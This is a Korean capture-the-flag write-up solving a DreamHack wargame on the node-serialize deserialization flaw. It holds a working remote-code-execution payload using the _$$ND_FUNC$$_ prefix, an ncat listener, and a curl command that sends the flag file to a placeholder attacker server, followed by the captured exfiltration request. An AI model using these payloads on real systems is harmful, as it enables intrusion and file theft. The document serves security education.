DreamHack - node-serialize (nodejs 직렬화 취약점) 풀이

 

node-serialize 취약점 예시

 

var serialize = require('node-serialize');


var x = {
rce : function(){
require('child_process').exec('echo serialize exploited!', function(error, stdout, stderr) { console.log(stdout) });
}(),
}

serialize.serialize(x);


var y = '{"username": "guest", "country": "Korea", "exec": "_$$ND_FUNC$$_function(){  require(\'child_process\').exec(\'echo unserialize exploited!\', function(error, stdout, stderr) { console.log(stdout) });  }()"}'

serialize.unserialize(y);

 

결과)

serialize exploited!

unserialize exploited!

 

serialize화와 unserialize화 취약점이 2개가 존재한다. 

이때 문자열 형태를 unserialize 하는 경우 함수 형태를 "_$$ND_FUNC$$_function()"로 작성해야 함수 실행이 가능하다. 

 

참고: 

http://news.grayhash.com/html/category/vulnerability/nodejs_vulnerability_serialization_Bug.html

The Graynews - [Vulnerability] node.js 취약점, 직렬화 버그

 

 

드림핵 워게임 풀이

 

힌트) 대상 서버가 curl 명령어를 사용 가능함

Dockerfile
RUN apk --no-cache add curl

---

파일 수신 서버 열기

index.js에는 flag 값을 출력하는 소스가 보이지 않아 보여 공격자의 서버로 flag 파일을 수신하기로 결정

ncat -lvp 4444 > flag.txt

---

공격
node-serialize 모듈의 직렬화 취약점을 이용 따옴표로 감싼 문자열은 _$$ND_FUNC$$_function(){/*content*/}() 이런식으로 함수를 작성하면 자동 실행

Exploit Code

{
  "username": "guest",
  "country": "Korea",
  "exec": "_$$ND_FUNC$$_function(){require('child_process').exec('curl -X POST -H \"Content-Type: multipart/form-data\" -F \"file=@/app/flag\" http://공격자서버', function(error, stdout, stderr){});}()"
}

Base64로 인코딩하고 profile 쿠키 값으로 설정하고 새로고침

---

수신된 flag 파일 확인

POST / HTTP/1.1
Host: 공격자서버
User-Agent: curl/7.83.1
Content-Length: 236
Accept: */*
Content-Type: multipart/form-data; boundary=------------------------0276c83fafa68ea3
X-Forwarded-For: 23.81.42.210
X-Forwarded-Proto: http
Accept-Encoding: gzip

--------------------------0276c83fafa68ea3
Content-Disposition: form-data; name="file"; filename="flag"
Content-Type: application/octet-stream

FLAG{플래그_내용}
--------------------------0276c83fafa68ea3--